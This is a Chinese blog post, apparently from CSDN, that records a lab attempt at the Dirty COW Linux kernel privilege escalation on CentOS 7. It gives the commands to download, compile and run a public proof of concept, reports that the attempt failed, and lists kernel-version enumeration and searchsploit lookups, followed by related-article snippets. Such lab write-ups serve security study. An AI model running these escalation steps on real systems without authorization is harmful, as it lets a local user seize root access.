dirtyCow脏牛内核提权

最新推荐文章于 2024-05-01 08:57:44 发布
最新推荐文章于 2024-05-01 08:57:44 发布
阅读量2.7k 收藏 3
点赞数
分类专栏: 漏洞复现 文章标签: 安全 linux 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65244586/article/details/123093023
版权

dirtyCow脏牛内核提权

这里我靶机用的是centos7,版本信息为

Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

image-20220124000534439

下载poc

wget https://github.com/FireFart/dirtycow/archive/master.zip

解压

unzip master.zip

编译

gcc -pthread dirty.c -o dirty -lcrypt

执行

./dirtyCow test(test输入的是密码)

image-20220123235901367

到这里就应该执行成功了,但是使用cat /etc/passwd查看用户时候,未发现firefart用户,未成功,应该是该版本不存在该漏洞。

image-20220124000039854 - 副本.png

其它内核漏洞提权

另外记录一下其它内核漏洞提权方法

1、查看发行版

cat /etc/issue
cat /etc/*-release

2、查看内核版本

uname -a

3、用kali自带的searchsploit来搜索exploitdb中的漏洞利用代码

searchsploit dirty

image-20220124002030865

参考:https://www.jianshu.com/p/db72a58649cc

明明如月001
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux系统版本信息查看
tangchao_17的博客
11-22 2372
一、查看Linux内核版本命令: 方法1、cat /proc/version [root@localhost ~]# cat /proc/version Linux version 3.10.0-957.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) ...
dirtycow脏牛提权
qq_44881113的博客
09-12 827
漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 以下是主流发行版修复之后的内核版本,如果你的内核版本低于列表里的版本,表示还存在脏牛漏洞 Centos7 /RHEL7 3.10.0-327.36.3.el7 Cetnos6/RHEL6 2.6.32-642.6.2.el6 Ubuntu 16.10 4.8.0-26.28 Ubuntu 16.04 4.4.0-45.66 Ubuntu 14.04
Linux脏牛漏洞提权复现
热门推荐
wangyuxiang946的博客
07-22 1万+
操作系统: Linux ( CentOS 6.5)Web服务: PHP+Apache
Linux操作命令
dfhjlll的博客
02-22 885
linux 操作命令 [root@localhost ~]# cat /etc/redhat-release [系统版本] [root@localhost ~]# uname -a [所有信息] [root@localhost ~]# uname -m [硬件信息] [root@localhost ~]# uname -n ...
2024年运维最全Linux脏牛漏洞提权复现_脏牛文件编译命令
最新发布
05-01 175
【代码】2024年运维最全Linux脏牛漏洞提权复现_脏牛文件编译命令。
linux提权
ccssggoo的博客
06-30 3769
linux提权的各种方法
mac上安装RIDE后执行ride.py提示找不到路径
chen__an的博客
10-10 785
pip install -U https://github.com/robotframework/RIDE/archive/master.zip 执行上边命令安装另一个版本的ride,原因是你安装的python版本与ride版本不符合要求。 参考:https://github.com/robotframework/RIDE https://www.cnblogs.com/dream66/p/10647166.html ...
【内网安全】——Linux提权姿势
Demo不是emo的博客
02-08 5521
Linux提权姿势汇总
dirtycow脏牛linux提权exp
03-25
这个漏洞利用了Linux内核中的一个内存管理错误,允许本地非特权用户获取root权限,进行权限提升,因此在网络安全领域中被称为“脏牛提权漏洞。 在Linux操作系统中,Copy-on-Write(COW)是一种内存管理策略,用于...
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
xss、脏牛提权.zip
06-18
《XSS与脏牛提权:深度解析与实践》 XSS(Cross-site scripting)攻击是一种常见的网络安全问题,它利用了网站对用户输入数据的信任,将恶意脚本注入到网页中,进而对用户进行攻击。在给定的“xss注入闯关小游戏”...
ubuntu本地内核提权37292.c
08-06
ubuntu本地内核提权
linux内核自动提权脚本.zip
02-01
这个压缩包文件"linux内核自动提权脚本.zip"包含了针对多种Linux内核版本的提权代码,能够自动化地检测系统环境并执行相应的提权操作。以下是对这一主题的详细解释: 1. **Linux内核**:Linux内核是操作系统的核心...
centos 7 升级内核版本
煜铭2011
08-06 2485
由于centos 7在某些情况下需要使用新内核支持某些应用或者修复安全补丁。
Linux系统管理
qq_50685659的博客
01-17 1380
系统管理类命令 ●ls 显示指定工作目录下的内容 ●-a 显示所有文件,包括隐藏文件(以.开头的文件) ●- A 显示所有文件,不包括.和… ●-d 仅列出目录本身,不列出目录下的文件 ●-l 列出长格式,显示文件的属性信息 ●-h 需要和-l搭配使用,将文件大小以易读的方式显示k,m,g ●-i 需要和-l搭配使用,可以显示出文件的inode ●-r 以倒序方式显示 ●-s 以文件大小排序 ●-t 以文件修改时间排序 ●pwd 显示当前工作目录 ●- P ●- L ●cd 改变当前工作目录
人大金仓V8R6 for RHEL7.6
qq_35435160的博客
01-26 753
人大金仓数据库安装 查看Linux系统版本信息 [root@localhost ~]# cat /proc/version Linux version 3.10.0-957.el7.x86_64 (mockbuild@x86-040.build.eng.bos.redhat.com) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Thu Oct 4 20:48:51 UTC 2018 查看Linux发行版本ID及描述信
密码的安全
m0_53073002的博客
01-09 2581
一、开关机安全控制 调整BIOS引导设置 将第一引导设备设为当前系统所在硬盘 禁止从其他设备(光盘、U盘、网络)引导系统 将安全级别设为setup,并设置管理员密码 GRUB限制 使用grub2-mkpasswd-pbkdf2生成密钥 修改/etc/grub.d/00_header文件中,添加密码记录 生成新的grub.cfg配置文件 限制更改GRUB引导参数 按e键通常情况下在系统开机进入GRUB菜单时,按e键可以查看并修改GRUB引导参数,这对服务器是一个极大的威胁。可以为GRUB菜单设置一个密码,只有
Linux 提权的各种姿势总结
zhalang8324的博客
02-21 3917
这篇讲一些关于 Linux 提权的方法,也是参考网上的一些提权方式,对于刚接触 Linux 提权的伙伴来说,需要花不少时间去理解,所以这里是以个人通俗易懂的思路去写,希望能帮到热爱学习的朋友,先写这些提权方法。若有更好的提权方式,欢迎老哥们在评论里补充一下。 提权可能需要反弹 bash ,因为脚本语言无法形成管道,需要创造一个管道才能进行后续的操作,比如溢出成功之后返回一个 root 权限的 s...
linux7 cve源码修复,Linux TCP漏洞 CVE-2019-11477 CentOS7 修复方法
weixin_34626572的博客
05-12 162
1 直接升级内核修复(需重启机器)#下载漏洞检测脚本#[root@CentOS7 ~]# wget https://access.redhat.com/sites/default/files/cve-2019-11477--2019-06-17-1629.sh#[root@CentOS7 ~]# ll总用量 36-rw-------. 1 root root 1608 3月 19 09:44 ...
linux远程脏牛提权
06-11
"脏牛"漏洞Linux内核中的一个本地提权漏洞,攻击者可以利用该漏洞在受害者系统上获得root权限。如果您想要远程利用该漏洞进行提权,需要首先在目标系统上获取访问权限。 一种方法是使用SSH连接到目标系统,然后执行利用脏牛漏洞的攻击代码。攻击代码可以是已经编写好的工具,也可以是自己编写的脚本。 请注意,利用脏牛漏洞进行攻击是非法的,可能会导致严重后果。建议您遵守法律法规并避免进行非法活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值